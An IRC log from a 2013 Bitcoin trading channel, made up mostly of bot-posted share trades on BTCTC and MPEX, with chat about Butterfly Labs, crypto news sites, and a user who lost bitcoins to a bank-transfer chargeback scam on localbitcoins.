23:43:40 [BTCTC] [BITVPS] 70 @ 0.00121 = 0.0847 BTC [+] Jul 04 23:43:57 [BTCTC] [BITVPS] 10 @ 0.0012 = 0.012 BTC [-] Jul 04 23:44:26 [BTCTC] [BITVPS] 278 @ 0.001102 = 0.3064 BTC [-] Jul 04 23:47:23 [BTCTC] [AMC-PT] 100 @ 0.002225 = 0.2225 BTC [+] Jul 04 23:52:52 [BTCTC] [AMC-PT] 124 @ 0.002225 = 0.2759 BTC [+] Jul 04 23:54:41 [BTCTC] [BITVPS] 5 @ 0.002747 = 0.0137 BTC [+] Jul 05 00:11:13 [BTCTC] [S.MPOE-PT] 35 @ 0.000992 = 0.0347 BTC [+] Jul 05 00:19:23 [BTCTC] [BASIC-MINING] 10 @ 0.162999 = 1.63 BTC [+] Jul 05 00:35:57 [BTCTC] [TAT.ASICMINER] 3 @ 0.045132 = 0.1354 BTC [-] Jul 05 00:35:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.045131 BTC [-] Jul 05 00:36:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.04513 BTC [-] Jul 05 00:36:04 [BTCTC] [TAT.ASICMINER] 20 @ 0.045129 = 0.9026 BTC [-] Jul 05 00:36:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.045129 BTC [-] Jul 05 00:36:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.045128 BTC [-] Jul 05 00:36:16 [BTCTC] [TAT.ASICMINER] 24 @ 0.045127 = 1.083 BTC [-] Jul 05 00:36:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.045127 BTC [-] Jul 05 00:36:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 00:36:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 00:36:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 00:36:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 00:36:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 00:36:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 00:36:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 00:36:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 00:36:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 00:36:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 00:36:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 00:36:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 00:36:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 00:36:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 00:36:45 [BTCTC] [TAT.ASICMINER] 16 @ 0.045125 = 0.722 BTC [-] Jul 05 00:36:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.045125 BTC [-] Jul 05 00:36:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.045125 BTC [-] Jul 05 00:36:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.045001 BTC [-] Jul 05 00:36:52 [BTCTC] [TAT.ASICMINER] 3 @ 0.045 = 0.135 BTC [-] Jul 05 00:36:53 [BTCTC] [TAT.ASICMINER] 7 @ 0.045 = 0.315 BTC [-] Jul 05 00:36:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.045 = 0.135 BTC [-] Jul 05 00:36:57 [BTCTC] [TAT.ASICMINER] 10 @ 0.04445 = 0.4445 BTC [-] Jul 05 00:36:59 [BTCTC] [TAT.ASICMINER] 5 @ 0.044444 = 0.2222 BTC [-] Jul 05 00:38:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.04441 BTC [-] Jul 05 00:40:56 [BTCTC] [CRYPTO-TRADE] 2 @ 0.2 = 0.4 BTC [+] Jul 05 00:41:34 [BTCTC] [CRYPTO-TRADE] 20 @ 0.2 = 4 BTC [+] Jul 05 00:42:23 [BTCTC] [BASIC-MINING] 3 @ 0.162999 = 0.489 BTC [+] Jul 05 00:42:53 [BTCTC] [PAJKA.BOND] 1 @ 0.055 BTC [+] Jul 05 00:44:13 don't supposed anyone here can confirm BFLs address Jul 05 00:45:58 dub: I have a business card, one sec. Jul 05 00:46:52 dub: https://www.dropbox.com/s/8a2l6jkeis0gt4l/2013-07-04%2022.46.00.jpg Jul 05 00:47:04 [MPEX] [S.MPOE] 3650 @ 0.00077859 = 2.8419 BTC [+] Jul 05 00:48:19 dub: that one came out a bit fuzzy, https://www.dropbox.com/s/hx7lk5c4cfotgq6/2013-07-04%2022.47.17.jpg that is better :) Jul 05 00:49:03 lal Jul 05 00:49:05 :) Jul 05 00:49:19 Azelphur: what about that problems in europe with CE? Jul 05 00:49:25 ? Jul 05 00:49:44 http://buttcoin.org/butterfly-labs-caught-allegedly-faking-ce-certification-bitcoiner-gets-his-miner-seized-in-germany Jul 05 00:49:45 Butterfly Labs caught allegedly faking CE certification, bitcoiner gets his miner seized in Germany. Jul 05 00:50:32 blimey, that's not good. Jul 05 00:50:54 luckily I was pre-smart and have already had mine arranged to be re-packaged and stripped of all labelling before shipping. Jul 05 00:54:14 heh Jul 05 00:54:26 does that mean they won't run on UK power, though? Jul 05 00:54:49 you the BFL bussiness card. Jul 05 00:54:49 :D Jul 05 00:55:05 I'm not a BFL business card :o Jul 05 00:55:07 well, dunno, but looks like, yes. Jul 05 00:55:11 I'm A HUMAN BEING. Jul 05 00:55:27 I will certainly have to look into this. Jul 05 00:55:32 depends on source, but should some jalapeno runs from USB? Jul 05 00:55:37 well, do ) Jul 05 00:55:43 for community and bitcoin indeed Jul 05 00:57:20 hi! Jul 05 00:58:09 because buttcoin.org is authorative Jul 05 00:58:39 would be good to get an address from someone that has shipped them something Jul 05 00:58:54 the address I have doesnt match Azelphur's Jul 05 00:59:16 dub: that was handed to me by josh in person at btclondon btw Jul 05 00:59:47 have you seen http://buttcoin.org/the-winklevoss-bitcoin-trust ? i especially like the assorted reactions in the end. Jul 05 00:59:51 ok, may have more than one address though Jul 05 01:00:23 [BTCTC] [BFMINES] 5 @ 0.004 = 0.02 BTC Jul 05 01:03:07 [BTCTC] [DMS.MINING] 1 @ 0.020499 BTC [+] Jul 05 01:09:22 [BTCTC] [ASICMINER-PT] 1 @ 4.480001 BTC [+] Jul 05 01:09:27 the number of times I've seen buttcoin.org quoted and people appearing to take it seriously is disturbing Jul 05 01:09:28 [BTCTC] [ASICMINER-PT] 2 @ 4.48 = 8.96 BTC [-] Jul 05 01:09:35 [BTCTC] [ASICMINER-PT] 10 @ 4.47 = 44.7 BTC [-] Jul 05 01:10:06 there is some point where even in the bitcoin world the retardation will reach division by zero realms Jul 05 01:10:50 [MPEX] [S.DICE] [PAID] 2,494.46047695 BTC to 50`000`000 shares, 4988 satoshi per share Jul 05 01:11:30 [BTCTC] [ASICMINER-PT] 1 @ 4.45 BTC [-] Jul 05 01:11:35 [BTCTC] [ASICMINER-PT] 2 @ 4.42 = 8.84 BTC [-] Jul 05 01:12:30 in this winklevoss etf case i happen to think the same Jul 05 01:13:02 oh nice dividend Jul 05 01:13:14 [BTCTC] [ASICMINER-PT] 1 @ 4.351 BTC [-] Jul 05 01:13:45 [BTCTC] [AMC-PT] 4 @ 0.002247 = 0.009 BTC [+] Jul 05 01:14:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.046099 BTC [+] Jul 05 01:15:10 s.dice still the leader of dividends hehe Jul 05 01:16:00 dub honestly, buttcoin.org is a lot better than bitcoin mag, Jul 05 01:16:15 I went off bitcoin mag ever since the matthewh3 incident Jul 05 01:16:21 and certainly leaps and bnounds ahead of the guardian and whoever else thinks itself "the real press" Jul 05 01:17:11 mircea_popescu: used toilet paper is a better read than bitcoin mag Jul 05 01:17:35 [BTCTC] [ASICMINER-PT] 1 @ 4.35 BTC [-] Jul 05 01:17:37 esp if used by mircea monroe. Jul 05 01:18:41 ..under withdrawal symptomes from vagostabyl. Jul 05 01:18:56 wat Jul 05 01:19:00 lol Jul 05 01:19:18 i use white superfluffy shit. i don't think white on white writes too well. Jul 05 01:21:01 [BTCTC] [ASICMINER-PT] 5 @ 4.273001 = 21.365 BTC [-] Jul 05 01:22:52 [BTCTC] [ASICMINER-PT] 2 @ 4.273 = 8.546 BTC [-] Jul 05 01:25:53 [BTCTC] [TAT.ASICMINER] 5 @ 0.045998 = 0.23 BTC [-] Jul 05 01:26:32 [BTCTC] [S.DICE-PT] 150 @ 0.002438 = 0.3657 BTC [+] Jul 05 01:27:44 [BTCTC] [BITVPS] 5 @ 0.002499 = 0.0125 BTC [-] Jul 05 01:27:51 https://www.courthousenews.com/2013/07/03/59061.htm Jul 05 01:31:09 [BTCTC] [RSM] 9 @ 0.015999 = 0.144 BTC [+] Jul 05 01:33:48 [BTCTC] [TAT.ASICMINER] 7 @ 0.045999 = 0.322 BTC [+] Jul 05 01:34:08 [BTCTC] [TAT.ASICMINER] 10 @ 0.045999 = 0.46 BTC [+] Jul 05 01:36:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.045999 BTC [+] Jul 05 01:38:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 01:38:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 01:38:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 01:38:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 01:38:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 01:38:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 01:38:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 01:39:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 01:42:32 [BTCTC] [BFMINES] 500 @ 0.004 = 2 BTC Jul 05 01:44:12 [BTCTC] [TAT.ASICMINER] 3 @ 0.046 = 0.138 BTC [+] Jul 05 01:51:59 [BTCTC] [ASICMINER-PT] 3 @ 4.300001 = 12.9 BTC [+] Jul 05 01:52:40 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Jul 05 01:54:22 [BTCTC] [ASICMINER-PT] 3 @ 4.42 = 13.26 BTC [+] Jul 05 01:55:00 [BTCTC] [ASICMINER-PT] 2 @ 4.42 = 8.84 BTC [+] Jul 05 01:55:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 01:55:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 01:55:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.045126 BTC [-] Jul 05 01:55:21 [BTCTC] [TAT.ASICMINER] 9 @ 0.04443 = 0.3999 BTC [-] Jul 05 01:55:23 [BTCTC] [TAT.ASICMINER] 23 @ 0.044422 = 1.0217 BTC [-] Jul 05 01:55:25 [BTCTC] [TAT.ASICMINER] 37 @ 0.044412 = 1.6432 BTC [-] Jul 05 01:55:27 [BTCTC] [TAT.ASICMINER] 6 @ 0.044411 = 0.2665 BTC [-] Jul 05 01:55:30 [BTCTC] [TAT.ASICMINER] 8 @ 0.044411 = 0.3553 BTC [-] Jul 05 01:55:33 [BTCTC] [TAT.ASICMINER] 6 @ 0.04441 = 0.2665 BTC [-] Jul 05 01:55:35 [BTCTC] [TAT.ASICMINER] 6 @ 0.04441 = 0.2665 BTC [-] Jul 05 01:55:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.04441 BTC [-] Jul 05 01:55:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.044402 BTC [-] Jul 05 01:55:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.044401 BTC [-] Jul 05 01:55:58 [BTCTC] [TAT.ASICMINER] 64 @ 0.044 = 2.816 BTC [-] Jul 05 01:55:59 [BTCTC] [TAT.ASICMINER] 19 @ 0.044 = 0.836 BTC [-] Jul 05 01:56:01 [BTCTC] [TAT.ASICMINER] 16 @ 0.043001 = 0.688 BTC [-] Jul 05 01:58:55 [BTCTC] [DMS.MINING] 90 @ 0.0195 = 1.755 BTC [-] Jul 05 01:59:37 [BTCTC] [BITVPS] 95 @ 0.002499 = 0.2374 BTC [-] Jul 05 02:00:50 http://rt.com/usa/kony-2012-arrested-masturbating-777/ Jul 05 02:01:19 [BTCTC] [BITVPS] 100 @ 0.002 = 0.2 BTC [-] Jul 05 02:01:30 old news Jul 05 02:01:35 i watched the sp Jul 05 02:01:44 with someone who was born in san diego Jul 05 02:01:58 and got to lord it all over them Jul 05 02:03:45 what ever happened to him, was he on LSD or just snapped or? Jul 05 02:04:13 he's a fucking fruitcake Jul 05 02:04:40 [BTCTC] [PAJKA.BOND] 6 @ 0.055 = 0.33 BTC [+] Jul 05 02:04:48 i would guess he was just a little weird. Jul 05 02:05:22 ;;google "let's make the water turn black" Jul 05 02:05:24 Let's Make the Water Turn Black - Wikipedia, the free encyclopedia: ; Frank Zappa - Let's make the water turn black - YouTube: ; Frank Zappa - Lets Make The Water Turn Black, 1967 - YouTube: Jul 05 02:07:01 more than a little wierd Jul 05 02:07:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.044409 = 0.0888 BTC [+] Jul 05 02:07:36 that invisible children shit is more of a cult than Luke-Jr's crazy ass sect Jul 05 02:10:23 nooo, you're iignorant. Jul 05 02:10:56 mircea_popescu: is channeling michael jackson? Jul 05 02:10:58 da fuck Jul 05 02:11:28 i wanna plaaay Jul 05 02:12:10 mircea_popescu has a son named blanket Jul 05 02:12:13 BLANKET LETS PLAY Jul 05 02:12:57 I GOT YOUR NOSE Jul 05 02:13:09 what'd i make it with, a llama ? Jul 05 02:14:04 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.004345 = 0.0261 BTC [-] Jul 05 02:15:51 [BTCTC] [ASICMINER-PT] 1 @ 4.5 BTC [+] Jul 05 02:16:50 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Jul 05 02:17:51 ;;seen perseval Jul 05 02:17:52 I have not seen perseval. Jul 05 02:17:55 hm Jul 05 02:18:02 ;;seen parseval Jul 05 02:18:03 parseval was last seen in #bitcoin-assets 8 hours, 3 minutes, and 51 seconds ago: Sure Jul 05 02:18:09 parseval nice charts. Jul 05 02:18:19 [MPEX] [S.MPOE] 1039 @ 0.00077591 = 0.8062 BTC [-] Jul 05 02:18:21 Hey Jul 05 02:18:21 [MPEX] [S.MPOE] 4200 @ 0.00077589 = 3.2587 BTC [-] Jul 05 02:18:27 Thanks Jul 05 02:18:48 [MPEX] [S.MPOE] 7734 @ 0.00077578 = 5.9999 BTC [-] Jul 05 02:18:49 [MPEX] [S.MPOE] 803 @ 0.00077573 = 0.6229 BTC [-] Jul 05 02:18:51 [MPEX] [S.MPOE] 4074 @ 0.00077385 = 3.1527 BTC [-] Jul 05 02:20:14 ;;seen Chaang-Noi Jul 05 02:20:15 Chaang-Noi was last seen in #bitcoin-assets 8 hours, 57 minutes, and 35 seconds ago: fuck gox Jul 05 02:22:06 [BTCTC] [S.MPOE-PT] 100 @ 0.001 = 0.1 BTC [+] Jul 05 02:22:50 [BTCTC] [BITVPS] 50 @ 0.0025 = 0.125 BTC [+] Jul 05 02:23:21 http://www.youtube.com/watch?v=HM4tpf2qKYE Jul 05 02:23:37 Bit Apple: Savvy pros push Bitcoin currency - YouTube Jul 05 02:24:17 parsval, I just sent thos elogs to you FYI Jul 05 02:24:25 I spy an MJR at the bar Jul 05 02:24:31 Thanks, TAT Jul 05 02:24:34 np Jul 05 02:24:48 i actually had trade-only logs from this chan Jul 05 02:24:53 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] Jul 05 02:24:58 the #bitfinder one has chat in it tho Jul 05 02:25:05 #bitfunder* Jul 05 02:25:18 of course the BF one is MUCH less reliable Jul 05 02:25:26 since the bot is very spotty Jul 05 02:26:33 it shouldn't be hard to fetch data from bf directly Jul 05 02:27:06 he has an API sorta Jul 05 02:27:08 the charts contain all trades, even if it makes them too slow. Jul 05 02:27:17 you just need to give BJs for it Jul 05 02:27:57 true jurov Jul 05 02:27:58 i just stretched the chart to max date range and pulled the json. no bjs. Jul 05 02:28:07 [BTCTC] [LTC-MINING] 1 @ 0.314359 BTC [+] Jul 05 02:28:09 [BTCTC] [LTC-MINING] 1 @ 0.31436 BTC [+] Jul 05 02:28:30 hmm that sounds useful, jurov Jul 05 02:31:27 hehe nice show mjr_ Jul 05 02:33:42 [BTCTC] [COGNITIVE] 1 @ 0.33 BTC [+] Jul 05 02:34:37 [BTCTC] [ASICMINER-PT] 1 @ 4.529999 BTC [+] Jul 05 02:36:03 [BTCTC] [COGNITIVE] 1 @ 0.344988 BTC [+] Jul 05 02:36:49 [BTCTC] [TAT.ASICMINER] 4 @ 0.044409 = 0.1776 BTC [+] Jul 05 02:37:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.04441 BTC [+] Jul 05 02:38:37 [BTCTC] [TAT.ASICMINER] 12 @ 0.04441 = 0.5329 BTC [+] Jul 05 02:39:59 [BTCTC] [TAT.ASICMINER] 12 @ 0.045 = 0.54 BTC [+] Jul 05 02:41:17 [BTCTC] [AMC-PT] 14 @ 0.00205 = 0.0287 BTC [-] Jul 05 02:41:57 [BTCTC] [COGNITIVE] 3 @ 0.30502 = 0.9151 BTC [-] Jul 05 02:41:58 [BTCTC] [COGNITIVE] 1 @ 0.305011 BTC [-] Jul 05 02:41:59 [BTCTC] [COGNITIVE] 3 @ 0.30501 = 0.915 BTC [-] Jul 05 02:42:00 [BTCTC] [COGNITIVE] 6 @ 0.305 = 1.83 BTC [-] Jul 05 02:42:02 [BTCTC] [COGNITIVE] 2 @ 0.30007 = 0.6001 BTC [-] Jul 05 02:43:31 [BTCTC] [DMS.MINING] 43 @ 0.020188 = 0.8681 BTC [+] Jul 05 02:45:21 [BTCTC] [DMS.MINING] 377 @ 0.020188 = 7.6109 BTC [+] Jul 05 02:45:48 [BTCTC] [TAT.ASICMINER] 3 @ 0.045 = 0.135 BTC [+] Jul 05 02:47:13 [BTCTC] [B.YABMC] 1 @ 0.0064 BTC [+] Jul 05 02:49:15 [BTCTC] [RSM] 5 @ 0.015977 = 0.0799 BTC [-] Jul 05 02:49:18 [BTCTC] [B.YABMC] 6 @ 0.0064 = 0.0384 BTC [+] Jul 05 02:49:20 [BTCTC] [B.YABMC] 12 @ 0.0064 = 0.0768 BTC [+] Jul 05 02:54:26 [BTCTC] [S.MPOE-PT] 20 @ 0.001 = 0.02 BTC [+] Jul 05 02:54:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.045 BTC [+] Jul 05 03:05:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.045 BTC [+] Jul 05 03:12:42 [BTCTC] [TAT.ASICMINER] 50 @ 0.043503 = 2.1752 BTC [-] Jul 05 03:18:29 [BTCTC] [BITVPS] 3 @ 0.0025 = 0.0075 BTC [+] Jul 05 03:21:12 [BTCTC] [ASICMINER-PT] 1 @ 4.362 BTC [-] Jul 05 03:21:55 [BTCTC] [AMC-PT] 2 @ 0.002245 = 0.0045 BTC [+] Jul 05 03:22:26 [BTCTC] [AMC-PT] 14 @ 0.002246 = 0.0314 BTC [+] Jul 05 03:22:50 ;;ticker Jul 05 03:22:51 MtGox BTCUSD ticker | Best bid: 79.20000, Best ask: 79.69197, Bid-ask spread: 0.49197, Last trade: 79.19000, 24 hour volume: 63421.14758666, 24 hour low: 72.00000, 24 hour high: 84.27001, 24 hour vwap: 78.28800 Jul 05 03:25:38 mircea_popescu: how are you today? Jul 05 03:25:43 great Jul 05 03:26:33 Very nice what is your take on btc price + Asic shares? Jul 05 03:27:05 heh. if i got something to say i usually say it. Jul 05 03:27:55 I figured from some of your posts! :P Jul 05 03:29:33 So that website is owned by you then? Jul 05 03:29:51 which ? Jul 05 03:30:05 olimedia.us/trilema/ Jul 05 03:30:08 woops Jul 05 03:30:11 p in front :D Jul 05 03:30:36 [BTCTC] [RSM] 10 @ 0.015966 = 0.1597 BTC [-] Jul 05 03:30:38 [BTCTC] [RSM] 27 @ 0.015967 = 0.4311 BTC [+] Jul 05 03:31:02 a, yeah. Jul 05 03:31:04 it's my blog. Jul 05 03:31:12 your blog is lame Jul 05 03:31:20 YOUR BLOG IS BAD AND YOU SHOULD FEEL BAD Jul 05 03:31:24 Nice man, get much traffic on a regular day? Jul 05 03:31:24 - Zoidberg Jul 05 03:31:33 Why not both - Zoidberg. Jul 05 03:32:01 I don't need no stinkin' traffic! Jul 05 03:32:05 I sit in traffic all day. Jul 05 03:32:11 What is this LA? Jul 05 03:32:13 :P Jul 05 03:32:17 \o/ :P Jul 05 03:32:28 Don't live in the U.S, don't have these problems \o/ Jul 05 03:32:45 [BTCTC] [BFMINES] 200 @ 0.004 = 0.8 BTC Jul 05 03:32:55 matthew_boyd used to be romania's most read blog, Jul 05 03:33:03 Good lord! Jul 05 03:33:04 but then i switched to english. turns out, romanians mostly read english. Jul 05 03:33:06 That's impressive! Jul 05 03:33:24 keep up the good work! Jul 05 03:33:25 [BTCTC] [DMS.PURCHASE] 2 @ 0.049263 = 0.0985 BTC [-] Jul 05 03:36:03 thestringpuller you know haters been sayin' that since years ago ? Jul 05 03:36:08 [BTCTC] [DMS.PURCHASE] 20 @ 0.049263 = 0.9853 BTC [-] Jul 05 03:47:18 [BTCTC] [S.MPOE-PT] 10 @ 0.001 = 0.01 BTC [+] Jul 05 03:49:24 [BTCTC] [TAT.ASICMINER] 5 @ 0.045797 = 0.229 BTC [+] Jul 05 03:55:02 haters have been saying what? Jul 05 03:57:01 [BTCTC] [TAT.ASICMINER] 5 @ 0.045797 = 0.229 BTC [+] Jul 05 04:05:34 [BTCTC] [TAT.VIRTUALMINE] 90 @ 0.004345 = 0.3911 BTC [-] Jul 05 04:07:20 [BTCTC] [TAT.ASICMINER] 41 @ 0.044011 = 1.8045 BTC [-] Jul 05 04:08:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.04579 BTC [+] Jul 05 04:18:52 Python interface unloaded Jul 05 04:18:52 Tcl interface unloaded **** ENDING LOGGING AT Fri Jul 5 04:18:52 2013 **** BEGIN LOGGING AT Fri Jul 5 11:54:22 2013 Jul 05 14:05:35 i <3 IRC Jul 05 14:29:24 malaimo metabyte midnightmagic MiningBuddy- mircea_popescu miscreanity mjr_ mod6_ Jul 05 14:29:26 irc lubs you too mjr_ Jul 05 14:31:36 ohai Jul 05 14:33:14 hi Jul 05 14:34:57 lol Jul 05 14:35:03 i mean, yeah i love these channels Jul 05 14:35:08 but i really love the protocol Jul 05 14:35:18 check out buttonwood_advanced.meteor.com :) Jul 05 14:36:29 it now has an IRC room Jul 05 14:36:37 linked in the site, so you can chat from cell phone Jul 05 14:37:18 but can access #bitcoin-assets or #bitcoin-otc Jul 05 14:38:13 i am working on the trading engine, order system, and profiles, once that is added in, i will launch it officially Jul 05 14:38:22 but i also need a market selection field Jul 05 14:44:51 that's pretty cool. Jul 05 14:45:21 thanks Jul 05 14:45:31 i really want to make this "glue" Jul 05 14:45:40 that links a bunch of different things in one place Jul 05 14:45:50 so i think i will add a market tab Jul 05 14:46:00 so you can check current prices on different exchanges Jul 05 14:46:14 the orders tab is going to be the most complicated Jul 05 14:49:26 eventually i'd like to make an iOS and Android app to complement it Jul 05 14:51:05 maybe even have a bot in the irc channel to execute some commands...who knows Jul 05 14:54:07 hey there! Someone just scammed me with 200+ BTC and transferred them to this address: blockchain.info/fb/1nrrenk Jul 05 14:54:22 do you know anything how i can get any information about this address and the owner of it? Jul 05 14:54:58 I would suggest you start with filing a police report Jul 05 14:55:07 Already done Jul 05 14:55:21 then I suggest you sue this individual in court and get a judgement against him Jul 05 14:55:22 police is informed but they are not so much familiar with btc Jul 05 14:55:36 yeah, but I dont know his identity Jul 05 14:56:01 I only have some IPs of him Jul 05 14:56:07 and his email addy Jul 05 14:56:17 then next time dont send BTC to people you dont know. Jul 05 14:56:26 I hope you learned your lesson. Jul 05 14:56:30 but i know that all of his btc transaction lead to thi saddress blockchain.info/fb/1nrrenk Jul 05 14:56:46 yes, and what do you expect any of us to be able to do about it? Jul 05 14:56:55 Diablo-D3, I did everything i can in this case, phoned him and tried to get all informations as possible Jul 05 14:57:05 do you know his name and address? Jul 05 14:57:10 <[Namworld]> It's not really possible to know the owner of a BTC address. Jul 05 14:57:17 Diablo-D3, it is fake Jul 05 14:57:18 <[Namworld]> You phoned him? Jul 05 14:57:22 yes Jul 05 14:57:31 jimmy2k: remember to make a scammer accusation on the bitcointalk forum Jul 05 14:57:37 so no one else does business with him Jul 05 14:57:37 also fake as it was pointed out now Jul 05 14:57:45 jimmy2k you can't. Jul 05 14:57:53 include the fake information Jul 05 14:57:58 this is the point of bitcoin. think before rather than after. Jul 05 14:58:00 yeah I traded with him on localbitcoins. the admins are informed and are trying to do their best too Jul 05 14:58:13 why not escrow ? Jul 05 14:58:29 mircea_popescu, I know the anonymity of btc thats why I tried to get everything i could before releasing the btc Jul 05 14:58:35 i phoned the bank and everything... Jul 05 14:58:38 ... Jul 05 14:58:40 <[Namworld]> Where did you get in contact with that person/why did you send him a payment/what happened? Jul 05 14:58:42 i did escrow with every trade Jul 05 14:58:42 that is not how you do it. Jul 05 14:58:44 get escrow. Jul 05 14:58:46 <[Namworld]> Oh, localbitcoins... Jul 05 14:58:54 <[Namworld]> They offer escrow service Jul 05 14:58:57 so then how exactly ? escrow stole it ? Jul 05 14:59:00 I used escrow Jul 05 14:59:20 so inform the escrow and have them return your BTC Jul 05 14:59:33 no, I released it because everything was fine. After couple of days my bank phoned me and told me i was accused for phishing Jul 05 14:59:37 the money is charged back Jul 05 14:59:38 ... Jul 05 14:59:45 tsk. Jul 05 15:00:00 <[Namworld]> Bank transfer? Jul 05 15:00:04 yes Jul 05 15:00:06 german bank transfer Jul 05 15:00:20 we're probably going to see an increase of these. Jul 05 15:00:24 seems they're successful. Jul 05 15:00:28 jimmy2k: okay so wait Jul 05 15:00:32 you were selling BTC to someone? Jul 05 15:00:35 yes Jul 05 15:00:38 ... Jul 05 15:00:44 let me explain something very simple to you Jul 05 15:00:44 he paid with a hacked bank account Jul 05 15:00:52 NEVER sell bitcoins to people using money that can be reversed! Jul 05 15:01:05 it is ALWAYS a scam! Jul 05 15:01:11 Diablo-D3 he didn't know it's reversable. Jul 05 15:01:19 ALL bank transfers are reversable! Jul 05 15:01:27 <[Namworld]> Cash in hand. I always do cash transactions for localbitcoins. Jul 05 15:01:27 my bank assured me that if a bank transfer is successfull, there is no chargeback possible... Jul 05 15:01:30 do it in person with cash next time! Jul 05 15:01:37 jimmy2k they like to lie. Jul 05 15:01:42 jimmy2k: bullshit, go read the EU banking law Jul 05 15:01:44 up to 90 days iirc Jul 05 15:01:50 Diablo-D3, its not true. I know in finnland the laws are different Jul 05 15:01:57 yeah it's true. they Jul 05 15:01:58 finland isnt exactly part of the EU Jul 05 15:02:15 <[Namworld]> Traditional payment methods... they say you're protected but that's rarely the case... Jul 05 15:02:16 they're part of another EU-related economic zone that Im forgetting the name of Jul 05 15:02:50 I think the chargeback is german specific or only possible in some few countries Jul 05 15:02:57 its not german specific Jul 05 15:02:58 I didnt know that since my bank lied to me Jul 05 15:03:00 any EU bank can do it Jul 05 15:03:04 and yes, banks lie Jul 05 15:03:06 US banks lie too Jul 05 15:03:08 its nothing new Jul 05 15:03:29 anyway, the fraud is done now and I will try everything to get my money back Jul 05 15:03:40 i'd focus more on clearing your name. Jul 05 15:03:43 you're not getting a dime back Jul 05 15:03:49 actually Jul 05 15:03:49 he can Jul 05 15:03:51 but ideally you don't go to prison as the head of a phishing ring Jul 05 15:03:55 police is helping me but i dont expect too much support and help from them since they are not so familiar with btc Jul 05 15:04:02 he can sue the german bank for the identity of the account holder Jul 05 15:04:15 since under EU law, the bank has to have verified ID on him Jul 05 15:04:24 Diablo-D3 you don't grok how this works. it's a 3 party scam. Jul 05 15:04:26 and then he can press criminal charges in germany against the guy Jul 05 15:04:42 mircea_popescu: I get how it works, he only needs to grab one of them Jul 05 15:04:43 yeah its a 3 party scam Jul 05 15:04:45 <[Namworld]> Well either it's a fraudulent chargeback or the bank account was indeed hacked. Jul 05 15:04:45 scammer moves money from innocent A to innocent B. Jul 05 15:04:54 his identity is not involved in the process. Jul 05 15:04:55 he wont get his money back, but at least 1 person will be in prison Jul 05 15:05:05 mircea_popescu: doesnt matter Jul 05 15:05:13 even if one of the so called "innocent" people go to prison, that is fine too Jul 05 15:05:37 well ideally it's not jimmy2k, and also ideally it's not the other schmuck being lied to by the bank/press/govt/etc Jul 05 15:05:45 the buyer in my case is a 75 year old man never heard the word bitcoin before Jul 05 15:05:50 right Jul 05 15:06:00 jimmy2k: thats what they all say Jul 05 15:06:10 thats what the police officer told me Jul 05 15:06:17 after having spoken to the account holder Jul 05 15:06:24 that is verified by the bank Jul 05 15:06:32 we're going to be seeing a lot more of these ;/ Jul 05 15:06:40 whatever Jul 05 15:06:47 next time, dont sell bitcoins unless you can get the cash in person Jul 05 15:06:48 <[Namworld]> People don't protect their accounts or computers. Then criminals use their account/computer to scam/spam people or conduct online attacks. It's really sad. Jul 05 15:06:52 he also accused me of phishing since i was the receiver of his money Jul 05 15:07:03 jimmy2k: then I'd sue the 75 year old man for slander Jul 05 15:07:17 <[Namworld]> A minimum is having a good antivirus software on your computer. Some still don't use one... Jul 05 15:07:18 my lawyer says I wont have success with that Jul 05 15:07:29 [Namworld] because 